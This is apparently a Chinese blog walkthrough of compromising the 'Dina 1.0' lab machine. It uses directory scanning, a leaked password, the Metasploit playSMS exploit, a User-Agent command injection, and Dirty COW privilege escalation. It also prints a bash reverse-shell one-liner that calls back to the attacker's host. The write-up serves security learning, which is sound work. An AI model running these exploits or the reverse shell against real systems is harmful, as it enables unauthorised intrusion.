靶机实战-Dina 1.0

2023-11-10 08:12
文章标签 实战 1.0 靶机 dina

本文主要是介绍靶机实战-Dina 1.0,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Dina 1.0靶机实战

文章目录

    • Dina 1.0靶机实战
    • 1、主机发现
    • 2、端口扫描
    • 3、端口详细信息扫描
    • 4、访问80端口--http服务
    • 5、提权
    • 提权方式二

1、主机发现

在这里插入图片描述
目标IP:192.168.232.157

2、端口扫描

在这里插入图片描述

3、端口详细信息扫描

在这里插入图片描述
只开放80端口

4、访问80端口–http服务

主页啥都没有,直接dirb扫一下目录
在这里插入图片描述
依次访问目录:
在这里插入图片描述
index就是主页,就不看了
发现robot中有五个目录:
在这里插入图片描述
依次访问:
在这里插入图片描述
在这里插入图片描述
其它两个页面跟第一个一样
继续访问:
//在/secure中发现一个zip文件而且可以下载
在这里插入图片描述
下载backup.zip文件,解压发现需要密码
在这里插入图片描述
不知道密码,先pass,去网页源码里看看有没有东西
发现http://192.168.10.181/nothing/源码中有记录密码
在这里插入图片描述
尝试用得到的密码解压,用密码freedom成功解压,解压发现是一个类似mp3的文件
在这里插入图片描述
在这里插入图片描述
用播放器打不开
在这里插入图片描述
用记事本打开:
在这里插入图片描述
发现url :/SecreTSMSgatwayLogin //Login?猜测是登录页面
在这里插入图片描述
果然是,然后尝试使用文件中的用户名touhid,密码freedom登录
在这里插入图片描述
在这里插入图片描述
不对?!,继续依次尝试在nothing源码中找到的密码
在这里插入图片描述
在这里插入图片描述
diana登录成功

在进入后台后,发现是playSMS,可通过metasploit查看相关漏洞看能否利用
在这里插入图片描述
使用use exploit/multi/http/playsms_filename_exec 进行漏洞利用
在这里插入图片描述
添加渗透攻击模块中的参数
在这里插入图片描述
exploit执行后成功,获取meterpreter权限
//上面两个exploit都可以获得meterpreter权限

5、提权

//查看内核版本,用脏牛提权
在这里插入图片描述
编译and执行:
在这里插入图片描述
在这里插入图片描述
提权成功

提权方式二

在网页中发现文件上传,并发现要求上传CSV文件:
在这里插入图片描述
但不知道文件上传后的路径在哪,所以文件上传漏洞没法使用
用searchsploit命令查询后门文件:
在这里插入图片描述
发现本页面后门文件42044.txt,查看其内容
在这里插入图片描述
根据文件所说,将命令写入表格:
在这里插入图片描述
去页面进行文件上传并抓包:
在这里插入图片描述
根据文件中提示,将user-agent修改为想要执行的命令,发现成功执行
在这里插入图片描述
利用此命令执行漏洞,进行反弹shell:
echo “bash -i>&/dev/tcp/192.168.232.130/1234 0>&1” | bash
在这里插入图片描述
点击GO,查看kali//kali提权开启监听
在这里插入图片描述
拿到shell,接下来提权
利用脏牛提权://下载dirty.c
因为上面已经用过脏牛提权,重新做的话要删除,重来,所以就不再做了
在这里插入图片描述
在这里插入图片描述

这篇关于靶机实战-Dina 1.0的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/381433

相关文章

使用 sql-research-assistant进行 SQL 数据库研究的实战指南(代码实现演示)

《使用sql-research-assistant进行SQL数据库研究的实战指南(代码实现演示)》本文介绍了sql-research-assistant工具,该工具基于LangChain框架,集... 目录技术背景介绍核心原理解析代码实现演示安装和配置项目集成LangSmith 配置(可选)启动服务应用场景

在Java中使用ModelMapper简化Shapefile属性转JavaBean实战过程

《在Java中使用ModelMapper简化Shapefile属性转JavaBean实战过程》本文介绍了在Java中使用ModelMapper库简化Shapefile属性转JavaBean的过程,对比... 目录前言一、原始的处理办法1、使用Set方法来转换2、使用构造方法转换二、基于ModelMapper

Java实战之自助进行多张图片合成拼接

《Java实战之自助进行多张图片合成拼接》在当今数字化时代,图像处理技术在各个领域都发挥着至关重要的作用,本文为大家详细介绍了如何使用Java实现多张图片合成拼接,需要的可以了解下... 目录前言一、图片合成需求描述二、图片合成设计与实现1、编程语言2、基础数据准备3、图片合成流程4、图片合成实现三、总结前

nginx-rtmp-module构建流媒体直播服务器实战指南

《nginx-rtmp-module构建流媒体直播服务器实战指南》本文主要介绍了nginx-rtmp-module构建流媒体直播服务器实战指南,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有... 目录1. RTMP协议介绍与应用RTMP协议的原理RTMP协议的应用RTMP与现代流媒体技术的关系2

C语言小项目实战之通讯录功能

《C语言小项目实战之通讯录功能》:本文主要介绍如何设计和实现一个简单的通讯录管理系统,包括联系人信息的存储、增加、删除、查找、修改和排序等功能,文中通过代码介绍的非常详细,需要的朋友可以参考下... 目录功能介绍:添加联系人模块显示联系人模块删除联系人模块查找联系人模块修改联系人模块排序联系人模块源代码如下

Golang操作DuckDB实战案例分享

《Golang操作DuckDB实战案例分享》DuckDB是一个嵌入式SQL数据库引擎,它与众所周知的SQLite非常相似,但它是为olap风格的工作负载设计的,DuckDB支持各种数据类型和SQL特性... 目录DuckDB的主要优点环境准备初始化表和数据查询单行或多行错误处理和事务完整代码最后总结Duck

Python中的随机森林算法与实战

《Python中的随机森林算法与实战》本文详细介绍了随机森林算法,包括其原理、实现步骤、分类和回归案例,并讨论了其优点和缺点,通过面向对象编程实现了一个简单的随机森林模型,并应用于鸢尾花分类和波士顿房... 目录1、随机森林算法概述2、随机森林的原理3、实现步骤4、分类案例:使用随机森林预测鸢尾花品种4.1

Golang使用minio替代文件系统的实战教程

《Golang使用minio替代文件系统的实战教程》本文讨论项目开发中直接文件系统的限制或不足,接着介绍Minio对象存储的优势,同时给出Golang的实际示例代码,包括初始化客户端、读取minio对... 目录文件系统 vs Minio文件系统不足:对象存储:miniogolang连接Minio配置Min

Node.js 中 http 模块的深度剖析与实战应用小结

《Node.js中http模块的深度剖析与实战应用小结》本文详细介绍了Node.js中的http模块,从创建HTTP服务器、处理请求与响应,到获取请求参数,每个环节都通过代码示例进行解析,旨在帮... 目录Node.js 中 http 模块的深度剖析与实战应用一、引言二、创建 HTTP 服务器:基石搭建(一

网页解析 lxml 库--实战

lxml库使用流程 lxml 是 Python 的第三方解析库,完全使用 Python 语言编写,它对 XPath表达式提供了良好的支 持,因此能够了高效地解析 HTML/XML 文档。本节讲解如何通过 lxml 库解析 HTML 文档。 pip install lxml lxm| 库提供了一个 etree 模块,该模块专门用来解析 HTML/XML 文档,下面来介绍一下 lxml 库